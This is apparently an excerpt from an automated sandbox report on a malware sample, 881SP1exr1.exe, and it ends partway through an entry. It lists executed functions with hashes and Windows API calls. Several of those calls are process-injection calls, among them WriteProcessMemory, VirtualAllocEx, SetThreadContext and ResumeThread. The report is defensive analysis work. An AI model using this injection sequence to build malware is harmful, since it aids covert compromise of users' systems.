Opcode Fuzzy Hash: 3147a78668dd57f1bc03a412b7dd3533a37298a9bf528a9a3e9773fe259d8134
Instruction Fuzzy Hash: 7041D2B4C00719CBDB24DFA9C888BDDBBF5BF49304F24806AD408AB255EBB55985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 015E590C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015E59C9

Memory Dump Source

Source File: 00000000.00000002.1643619835.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_881SP1exr1.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2b11d1209a09cbf1b0ee611acf2516471af7b8d6538a676aa3f0a7c64c9a29f5
Instruction ID: 7163db06a7620b79129a0c7f9b4b021985b7d8de41863b2661a25f21e3481e51
Opcode Fuzzy Hash: 2b11d1209a09cbf1b0ee611acf2516471af7b8d6538a676aa3f0a7c64c9a29f5
Instruction Fuzzy Hash: 3B41D2B4C00719CBDB24CFA9C9847CDBBF5BF49308F24805AD408AB255EB755985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 078D9DF8 Relevance: 1.6, APIs: 1, Instructions: 77
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 078D9DC5

Memory Dump Source

Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: fb7fb24558159b001b1032c10123eb8b274e3b4be3e75b5aff1f0b90a13708e6
Instruction ID: 59eff1efccca8c55c52db7251d458f28e3fc3210e02bef697398b92854ce3fd8
Opcode Fuzzy Hash: fb7fb24558159b001b1032c10123eb8b274e3b4be3e75b5aff1f0b90a13708e6
Instruction Fuzzy Hash: 5F21ECB2A042198BDB10EFA4D8193EEBBF4EF58314F04445AD844F7241C7782D84CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 078D8570 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 078D8608

Memory Dump Source

Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 803f452ff7d16f58bd89c12bb3615a9cec4d6b860123a1d735109e35379e3289
Instruction ID: 893a5b5fa8baef8d49a18905228c30861807779478e59823b62c37bcda4b1fe6
Opcode Fuzzy Hash: 803f452ff7d16f58bd89c12bb3615a9cec4d6b860123a1d735109e35379e3289
Instruction Fuzzy Hash: 552148B19003199FCB10CFA9C885BDEBBF5FF48320F108429E918A7240C7789944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 078D8662 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 078D86E8

Memory Dump Source

Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: e717cb08df2ad7dfa3ed9ca6f1604eef28ff3e89672fd46e6914792e59b4cbb1
Instruction ID: 9497d6a25c2dfbb6a7e1176e03d6d0a247d7724cf1f831074cc46a9a96ffb5a4
Opcode Fuzzy Hash: e717cb08df2ad7dfa3ed9ca6f1604eef28ff3e89672fd46e6914792e59b4cbb1
Instruction Fuzzy Hash: DC2128B18002599FCB10DFA9C984AEEFBF5FF48320F10882AE558A7250C7789954CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 078D8178 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 078D81FE

Memory Dump Source

Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d7140288a38cfdf15875fa261321cf8d40be66c26fbb33abeec68e45429719f5
Instruction ID: 0398de847561ed286300205142a9996df393a1e8124711921ee4e7a72759b32d
Opcode Fuzzy Hash: d7140288a38cfdf15875fa261321cf8d40be66c26fbb33abeec68e45429719f5
Instruction Fuzzy Hash: 5E2149B19003098FDB10DFAAC584BEEBBF5EF48324F14842AD459A7250DB789985CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 015ED628 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015ED6B7

Memory Dump Source

Source File: 00000000.00000002.1643619835.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_881SP1exr1.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7c22153629d987d815f287fbcd1967206ab22099897de6ab6e065231b9ac7c7d
Instruction ID: 17a4cc3bcf24ed95bdb203aac94ea7e2d30ccfa1dbcc23b371535ef2e7846f03
Opcode Fuzzy Hash: 7c22153629d987d815f287fbcd1967206ab22099897de6ab6e065231b9ac7c7d
Instruction Fuzzy Hash: 8721E0B5D002199FDB10CFAAD984ADEBBF5FB48324F14841AE918A7350C378A944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 078D8668 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 078D86E8

Memory Dump Source

Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f1fcf8b8e56ffd27a0e987a3c69207b5b89943d191be49c0736cb8528318f004
Instruction ID: 5fafe3af3ae494c83aabde68496620911170ced05222e7968cd9b62dc09e10f0
Opcode Fuzzy Hash: f1fcf8b8e56ffd27a0e987a3c69207b5b89943d191be49c0736cb8528318f004
Instruction Fuzzy Hash: AC2139B18003599FCB10DFAAC844ADEFBF5FF48320F108429E558A7250C7749944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 078D8180 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 078D81FE

Memory Dump Source

Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 1b6d8131ff06e97043145f1dad9e8e6f7f334eafd90f5714825c3ebed3492998
Instruction ID: 9e1f89fa6e45baa53c0afd0bc2ec85ad2ea94f0d83baaea7bb80bd241aaf2b55
Opcode Fuzzy Hash: 1b6d8131ff06e97043145f1dad9e8e6f7f334eafd90f5714825c3ebed3492998
Instruction Fuzzy Hash: 5E2149B19003098FDB10DFAAC485BEEBBF4EF48324F108429D459A7240D7789984CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 015ED630 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015ED6B7

Memory Dump Source

Source File: 00000000.00000002.1643619835.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_881SP1exr1.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 13d255fa8e98542d28c7e17fe06a035b857f2cecadfdc4e1a9cb97cfcedce9a2
Instruction ID: 730738138bf65ecdbf952a11e651a9b0306004eb469277e2fcc6aa047bc22e24
Opcode Fuzzy Hash: 13d255fa8e98542d28c7e17fe06a035b857f2cecadfdc4e1a9cb97cfcedce9a2
Instruction Fuzzy Hash: 9A21E2B5D002089FDB10CFAAD984ADEBFF9FB48320F14841AE918A7350C374A944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 078D8251 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 078D82C6

Memory Dump Source

Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 43507999e9d6fdc0b3ef097de1d50eac75965cb1bd8611e9490f7b07dec74dfc
Instruction ID: e7e4f9e4b6d75a744616bc87506460040e92904ad8333408a29dea4e978d7857
Opcode Fuzzy Hash: 43507999e9d6fdc0b3ef097de1d50eac75965cb1bd8611e9490f7b07dec74dfc
Instruction Fuzzy Hash: 6D1167B29002499FCB10DFAAC844BDEFFF5EF88324F14881AE559A7250C7759994CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 015EA0D0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,015EB019,00000800,00000000,00000000), ref: 015EB22A

Memory Dump Source

Source File: 00000000.00000002.1643619835.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_881SP1exr1.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7208d40d3f9854af616db3dd4b30ccd935d9420a51ae0750d21853f82321a73b
Instruction ID: 8a5196487881ce02d0dd71940258948f5bd0f1ed26703b87a0427bc463e5a3a6
Opcode Fuzzy Hash: 7208d40d3f9854af616db3dd4b30ccd935d9420a51ae0750d21853f82321a73b
Instruction Fuzzy Hash: FB11E4B6D002099FDB14DF9AD448ADEFBF5FF48310F10842AE519AB250C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 015EB1B9 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,015EB019,00000800,00000000,00000000), ref: 015EB22A

Memory Dump Source

Source File: 00000000.00000002.1643619835.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_881SP1exr1.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e0cb5c80a383f46e659ce5e0e6cdbd994fc3896494fa21bf06412dddd2f99892
Instruction ID: 011a8cbfed9474fa7d49d70f6d0f6e30fef6689c7f8ef1a12662715d45755a7b
Opcode Fuzzy Hash: e0cb5c80a383f46e659ce5e0e6cdbd994fc3896494fa21bf06412dddd2f99892
Instruction Fuzzy Hash: 321100B6D002498FDB14DFAAD448ADEFBF4FB48310F14842AD559AB210C3B5A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 078D8258 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 078D82C6

Memory Dump Source

Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ea2f73db6b43e54c4e564d72c7ec5b76315d4438d13a96042b0ebed61c6bbb7e
Instruction ID: ba730e7ab7e80ffe58fee2aaa9c568b4e9452d0556e618b45d9a594549c78eb5
Opcode Fuzzy Hash: ea2f73db6b43e54c4e564d72c7ec5b76315d4438d13a96042b0ebed61c6bbb7e
Instruction Fuzzy Hash: B01137B19002499FCB10DFAAC844BDFBFF5EF88324F108819E559A7250C775A954CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 078D80D0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 078D8132

Memory Dump Source

Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8b2dedcfd5ee604d3f8356ea3a6cee088fe317c2689ae284a491cb6c8468ca8e
Instruction ID: 2e20c694e0b8fe13ac68301b625fa5f273ddc1d2b2380b2b9f3543923bf558e8
Opcode Fuzzy Hash: 8b2dedcfd5ee604d3f8356ea3a6cee088fe317c2689ae284a491cb6c8468ca8e
Instruction Fuzzy Hash: A7113AB19002598FCB10DFAAC4457DEFBF5EB88324F208819D559A7250C775A944CF94

Uniqueness

Uniqueness Score: -1.00%

Function 015EAF38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 015EAF9E

Memory Dump Source

Source File: 00000000.00000002.1643619835.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_881SP1exr1.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d02f565ecb4badedbd0c928e16aa1f28dc3222f993cb0f0b85a6ef7755c8f92f
Instruction ID: 9cb075d91386f0a382f27bfe1f115617ddc07e60808f4695bc2130cbc93488a7
Opcode Fuzzy Hash: d02f565ecb4badedbd0c928e16aa1f28dc3222f993cb0f0b85a6ef7755c8f92f
Instruction Fuzzy Hash: 891113B5C002498FDB14CF9AC448ADEFBF4AB88314F10841AD428A7250C375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 078D9D68 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 078D9DC5

Memory Dump Source

Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 19030491d775072b8682a60f4554679017c6d10ac69d7d7ad67ed1788d127e37
Instruction ID: 8dda7eab5944f30e1d6555f463181a03a56a5e198feb5c964dbcebb1a81ca091
Opcode Fuzzy Hash: 19030491d775072b8682a60f4554679017c6d10ac69d7d7ad67ed1788d127e37
Instruction Fuzzy Hash: 9C11D3B58003499FDB10DF9AC449BDEBBF8EB48324F108819D558A7650C375A984CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0133D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643258673.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_133d000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ccb21fd9ac1646860b7bba8913cd63a69c92c95585d7e6c6627c0e1555ac13e
Instruction ID: e5ebc938054b242f874e208fd25ca0f1ccfbdd0bc2304796764076abdee79bce
Opcode Fuzzy Hash: 9ccb21fd9ac1646860b7bba8913cd63a69c92c95585d7e6c6627c0e1555ac13e
Instruction Fuzzy Hash: 80214571104204DFDB01DF58D9C0B66BF69FBC8328F60C269E90A1B256C73AE456CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0134D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643305675.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_134d000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 951ba069cf27680efb6c33e52f0e057cadc5951069903de4cd2f3cc708a6411a
Instruction ID: 820d60ceb7413d79974f1b33644d91be0dd8cc6e8b9434a6543f2a2d9d098ecc
Opcode Fuzzy Hash: 951ba069cf27680efb6c33e52f0e057cadc5951069903de4cd2f3cc708a6411a
Instruction Fuzzy Hash: 1E212671604204EFDB05DF98D9C4B26BBE5FB94328F20C66DE9094B356C336E446CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0134D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643305675.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_134d000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08bb7b5901c6c82b98df21b97132aaf93cef0fec1aadf06e38eac5b9273f86af
Instruction ID: 14b0865a7926cbde8bb29e94996149224e19f405fd9e847e148429bab0ef8062
Opcode Fuzzy Hash: 08bb7b5901c6c82b98df21b97132aaf93cef0fec1aadf06e38eac5b9273f86af
Instruction Fuzzy Hash: 0B213471604204DFCB15DF98D9C4B26BFA5FB94318F20C56DD80A4B356C33AE447CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0134D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643305675.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_134d000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7141ea30c0fd263294a51673e1b84b606ff684cfc10a63615a63b4509048ffed
Instruction ID: 7049163d04b7210f6b6070b8804fbe5073744b9f5b1334aa112a37010e6c965d
Opcode Fuzzy Hash: 7141ea30c0fd263294a51673e1b84b606ff684cfc10a63615a63b4509048ffed
Instruction Fuzzy Hash: 0F2192755083809FCB03CF54D994711BFB1EB56318F28C5DAD8498F2A7C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0133D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643258673.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_133d000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 00649e786bf884430d1b85875da5738868cee651d963c86f6ce5b0a99e27a109
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 16110072404280CFDB02CF54D9C4B56BF72FB94328F24C2A9D9090B257C33AE45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0134D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643305675.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_134d000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 9317e10378370c612e5c3d7d4bdaac197e63743b827b0ffc250892ca9760398a
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 7111BB75504280DFDB02CF54C5C4B15BFB1FB84228F24C6AAD8494B296C33AE40ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 0133D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643258673.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_133d000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 584e80c4c91799f5ef93acea54a8f270f0ca802feac9e3d5db4a0b7f535a7539
Instruction ID: 1d85d67d0f85097198774a09537d6f1ddcc0dfe17017bcc248df90278ea49fb6
Opcode Fuzzy Hash: 584e80c4c91799f5ef93acea54a8f270f0ca802feac9e3d5db4a0b7f535a7539
Instruction Fuzzy Hash: 28012B310083849AE7125E69CD84B67BF9CEF81368F48C92AED090A286C279D840C6B5

Uniqueness

Uniqueness Score: -1.00%

Function 0133D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643258673.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_133d000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4db99fbb530082cd285069274a6e7a1f264e7552c851a1ddff4e49749486d329
Instruction ID: 7b5ad72664f1eb7a8acf9c14d8670a4b58686147da0d162d39c12b6e9e7277c4
Opcode Fuzzy Hash: 4db99fbb530082cd285069274a6e7a1f264e7552c851a1ddff4e49749486d329
Instruction Fuzzy Hash: B1F09671404384AEE7119E1ADCC8B62FFA8EF81738F18C45AED084F286C2799844CBB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 015ED55C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643619835.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_881SP1exr1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0a302e6fd28530a4f8f8648c1ed0e224d4d00c6a21d318184b2bee294b82ac5
Instruction ID: ac499f9c7f8c76b73d26d99be4617ae17d2f98d161c655624b95ac96368d8f12
Opcode Fuzzy Hash: d0a302e6fd28530a4f8f8648c1ed0e224d4d00c6a21d318184b2bee294b82ac5
Instruction Fuzzy Hash: 7CA14B32E0021A8FCF19DFB4C84459EBBF2BF85300B15856AE905AF265DF71D955CB40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 881SP1exr1.exePID: 7420, Parent PID: 7264COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	2.7%
Signature Coverage:	5.9%
Total number of Nodes:	559
Total number of Limit Nodes:	73

Executed Functions

Function 0041A44A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475

Strings

bMA, xrefs: 0041A40D, 0041A414
bMA, xrefs: 0041A400

Memory Dump Source

Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd

Yara matches

Similarity

API ID: CloseFileRead
String ID: bMA$bMA
API String ID: 752142053-1998556560
Opcode ID: 4555b8db24263beb396bddce414187ec1e3ee0d2ccf8c281040a10ff5ee7e2c3
Instruction ID: c5433787d6f9d94ca67f4c19549f6707bba6345fab498e1b4a6d86f392923fb9
Opcode Fuzzy Hash: 4555b8db24263beb396bddce414187ec1e3ee0d2ccf8c281040a10ff5ee7e2c3
Instruction Fuzzy Hash: A4112DB6204108BFDB14DF98DC84DEB77ADEF8C310B14865DFA5C87205C634E8518BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3D0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415

Strings

bMA, xrefs: 0041A40D, 0041A414
!JA, xrefs: 0041A3EC, 0041A3F8
bMA, xrefs: 0041A3F2, 0041A400

Memory Dump Source

Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !JA$bMA$bMA
API String ID: 2738559852-4222312340
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 54437c4e75339082d0912fbe7e6c9053912bd6928cda1a9760da43cab1c95c7d
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: C3F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52

Memory Dump Source

Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
Instruction ID: 93036d1b31c8ba6342ae8de3f2893f5930aff37f33252288d1eb8296453bc5b5
Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
Instruction Fuzzy Hash: FF015EB5E0020DABDB10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041A320 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D

Memory Dump Source

Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 30690d9e011530b668ed3b4ae7cc5c3fda29d367b226dbf4f68f65ca016a7565
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: FDF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A31B Relevance: 1.5, APIs: 1, Instructions: 39
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D

Memory Dump Source

Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 10e2313bae08c4ea56f4ec5b6a294a75bc6ffca9dc3441b5507330e58ac5edb4
Instruction ID: d6a5240eb07b507b895d18ca407b66409a8d8d5b7c24692f6b929a3d25f7b8d7
Opcode Fuzzy Hash: 10e2313bae08c4ea56f4ec5b6a294a75bc6ffca9dc3441b5507330e58ac5edb4
